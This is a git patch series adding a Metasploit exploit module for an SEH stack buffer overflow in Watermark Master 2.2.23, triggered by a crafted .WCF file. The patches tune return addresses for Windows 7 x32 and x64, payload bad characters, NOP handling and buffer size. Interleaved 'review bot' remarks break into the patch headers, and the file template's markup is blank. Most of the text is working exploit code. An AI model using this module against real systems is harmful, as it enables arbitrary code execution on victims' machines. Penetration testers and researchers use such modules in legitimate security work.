From 03eb2d71b2b65f54b270293e350713544e6c9d68 Mon Sep 17 00:00:00 2001
From: jakxx
Date: Thu, 13 Aug 2015 16:26:17 -0400
Subject: [PATCH 1/7] Add watermark fileformat exploit
---
 .../windows/fileformat/watermark_master.rb | 93 +++++++++++++++++++
 1 file changed, 93 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/watermark_master.rb
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
new file mode 100644
index 0000000000..fbbcb62ed9
--- /dev/null
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Watermark Master Buffer Overflow (SEH)',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when
+ processing a specially crafted .WCF file. This vulnerability could be
+ exploited by a remote attacker to execute arbitrary code on the target
+ machine by enticing a user of Watermark Master to open a malicious .WCF file.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'metacom', # Original discovery
+ 'Andrew Smith', # MSF Module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '99226' ],
+ [ 'CVE', '2013-6935'],
+ [ 'EBD', '29327' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunc' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+ 'DisableNops' => true,
+ 'Space' => 7276
+ },
+
+ 'Targets' =>
+ [
+ [ 'Watermark Master 2.2.23',
+ {
+ 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll
+ 'Offset' => 516
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Nov 1 2013',
+ 'DefaultTarget' => 0))
+
+ register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),], self.class)
+
+ end
+
+ def exploit
+
+ buffer = rand_text(target['Offset'])
+ buffer << generate_seh_record(target.ret)
+ buffer << make_nops(100)
+ buffer << payload.encoded
+ buffer << rand_text(10000)
+
+ file = %Q|
+
+
+
+
+
+
+
+
+
+
+
+
+
+|
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create(file)
+
+ end
+end
+
From 361624161baf06da9bdc66da0f1553d969cfb2e9 Mon Sep 17 00:00:00 2001
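Review bot: The reference type in `[ 'EBD', '29327' ]` is not one the framework resolves; Exploit-DB entries are tagged `'EDB'`, so the line should read `[ 'EDB', '29327' ]` or the reference will not render as a link. The `BadChars` value `"\x00\x0a\x0d\x3c\x22\x26"` also lacks a why-comment: `\x3c`, `\x22` and `\x26` are `<`, `"` and `&`, which is consistent with the buffer being interpolated into the markup of the `%Q|` template below, whose contents are not visible in this view. A comment such as `# NUL, CR/LF and the XML metacharacters < " & — the buffer is embedded in .WCF markup (confirm against the template)` would record the reason so a later edit to the template keeps the two in step.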
From: jakxx
Date: Thu, 13 Aug 2015 16:27:27 -0400
Subject: [PATCH 2/7] msftidy
---
 modules/exploits/windows/fileformat/watermark_master.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index fbbcb62ed9..cf57168fbd 100644
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- print_status("Creating '#{datastore['FILENAME']}' file ...")
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
 file_create(file)
 end
From 6e1c714b2bd6b734cf312a5ae310a77239d6050b Mon Sep 17 00:00:00 2001
From: jakxx
Date: Thu, 13 Aug 2015 17:24:18 -0400
Subject: [PATCH 3/7] Update to leverage auto-NOP generation
---
 modules/exploits/windows/fileformat/watermark_master.rb | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index cf57168fbd..fa01606f2b 100644
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Payload' =>
 {
 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
- 'DisableNops' => true,
+ 'DisableNops' => false,
 'Space' => 7276
 },
@@ -65,9 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 buffer = rand_text(target['Offset'])
 buffer << generate_seh_record(target.ret)
- buffer << make_nops(100)
 buffer << payload.encoded
- buffer << rand_text(10000)
 file = %Q|
From e9d3289c23c4e406cadeaf8a0e3e84ab98a364b2 Mon Sep 17 00:00:00 2001
From: jakxx
Date: Thu, 13 Aug 2015 17:25:31 -0400
Subject: [PATCH 4/7] EXITFUNC caps
---
 modules/exploits/windows/fileformat/watermark_master.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
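Review bot: The second hunk of PATCH 3/7 drops `make_nops(100)` and the first flips `'DisableNops'` to `false`, but nothing in `exploit` records the framework behaviour this now relies on — with NOPs enabled the encoder hands back `payload.encoded` already padded with a sled up to `'Space'`, so an explicit sled would be redundant (my reading of `Msf::EncodedPayload`; confirm). A comment above `buffer << payload.encoded`, e.g. `# payload.encoded is NOP-padded to 'Space' by the framework (DisableNops is false); no explicit sled needed`, would stop a later maintainer from re-adding one. Removing `rand_text(10000)` also shortens the generated file, and the commit message does not say whether that trailer was dead bytes; the later patch in this series re-adds a trailer, which suggests it was not. The `exploit` method continues past the end of the second hunk.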
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index fa01606f2b..eb1fe53cd9 100644
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'DefaultOptions' =>
 {
- 'ExitFunc' => 'process',
+ 'EXITFUNC' => 'process',
 },
 'Platform' => 'win',
 'Payload' =>
From f18e1d69a1b5390be39ed1cd9d9b47cf54771c74 Mon Sep 17 00:00:00 2001
From: jakxx
Date: Tue, 29 Sep 2015 22:36:30 -0400
Subject: [PATCH 5/7] Add x64 ret address and add to buffer
---
 modules/exploits/windows/fileformat/watermark_master.rb | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index eb1fe53cd9..978734151a 100644
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -46,6 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'Targets' =>
 [
+ [ 'Windows 7 x32 - Watermark Master 2.2.23',
+ {
+ 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll
+ 'Offset' => 516
+ }
+ ],
 [ 'Watermark Master 2.2.23',
 {
 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll
@@ -66,6 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 buffer = rand_text(target['Offset'])
 buffer << generate_seh_record(target.ret)
 buffer << payload.encoded
+ buffer << rand_text(9000)
 file = %Q|
From 47c79071ebd1aca317ee938be6a99640384c760d Mon Sep 17 00:00:00 2001
From: jakxx
Date: Tue, 29 Sep 2015 22:41:36 -0400
Subject: [PATCH 6/7] fix indention and typo
---
 modules/exploits/windows/fileformat/watermark_master.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index 978734151a..1fbabf6716 100644
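Review bot: The added `buffer << rand_text(9000)` in the second hunk of PATCH 5/7 reintroduces trailing filler as a bare magic number with no comment on why the generated file needs it, and the same line is rewritten in PATCH 7/7 (`18000 - buffer.length`) still without one. A comment above it, e.g. `# trailing filler: the file must be larger than buffer + payload alone — found empirically, TODO document the minimum size`, would make the constant reviewable rather than something the next maintainer has to rediscover. Both hunks sit inside `initialize` and `exploit`, whose bodies extend beyond the hunk boundaries.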
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -46,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote
 'Targets' =>
 [
- [ 'Windows 7 x32 - Watermark Master 2.2.23',
+ [ 'Windows 7 x32 - Watermark Master 2.2.23',
 {
 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll
 'Offset' => 516
 }
 ],
- [ 'Watermark Master 2.2.23',
+ [ 'Windows 7 x64 - Watermark Master 2.2.23',
 {
- 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll
+ 'Ret' => 0x1001329a, #p/p/r | CommonClassesMFC.dll
 'Offset' => 516
 }
 ],
From c5237617f249c3633ed635898fea68d9745fc5d8 Mon Sep 17 00:00:00 2001
From: jakxx
Date: Tue, 6 Oct 2015 18:12:40 -0400
Subject: [PATCH 7/7] Update buffer size for reliability
---
 modules/exploits/windows/fileformat/watermark_master.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb
index 1fbabf6716..af6a94c36b 100644
--- a/modules/exploits/windows/fileformat/watermark_master.rb
+++ b/modules/exploits/windows/fileformat/watermark_master.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 buffer = rand_text(target['Offset'])
 buffer << generate_seh_record(target.ret)
 buffer << payload.encoded
- buffer << rand_text(9000)
+ buffer << rand_text(18000 - buffer.length)
 file = %Q|
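Review bot: The renamed x64 target in PATCH 6/7 takes a different `Ret` (`0x1001329a`) but keeps the identical comment `#p/p/r | CommonClassesMFC.dll`, so the comments no longer explain why the two entries differ — presumably the x64 installer ships a different build of that DLL, but that is an inference. Each entry's comment should name the DLL version or build it was taken from, e.g. `#p/p/r | CommonClassesMFC.dll (<DLL version from the x64 install — TODO confirm>)`, so the address can be re-verified later. Framework target names use `x86` rather than `x32`, so `'Windows 7 x86 - Watermark Master 2.2.23'` would match the convention the other modules follow.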
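Review bot: `rand_text(18000 - buffer.length)` in PATCH 7/7 fixes the total buffer at 18000 bytes but leaves both the constant and its purpose undocumented, and if `buffer.length` ever exceeded 18000 the negative length would, as far as I can tell from `Rex::Text.rand_base`, yield an empty string rather than an error, so the size contract would fail silently. Naming the constant with its intent, e.g. `total_len = 18000 # keep the generated file at a fixed size (reliability, see commit message) — TODO document why` followed by `buffer << rand_text(total_len - buffer.length)`, makes the expectation explicit, and a `fail_with(Failure::BadConfig, 'Payload too large for fixed file size')` when `buffer.length > total_len` would surface the problem instead of hiding it. The last context line of this hunk (the start of the `%Q|` template) is not visible in this view.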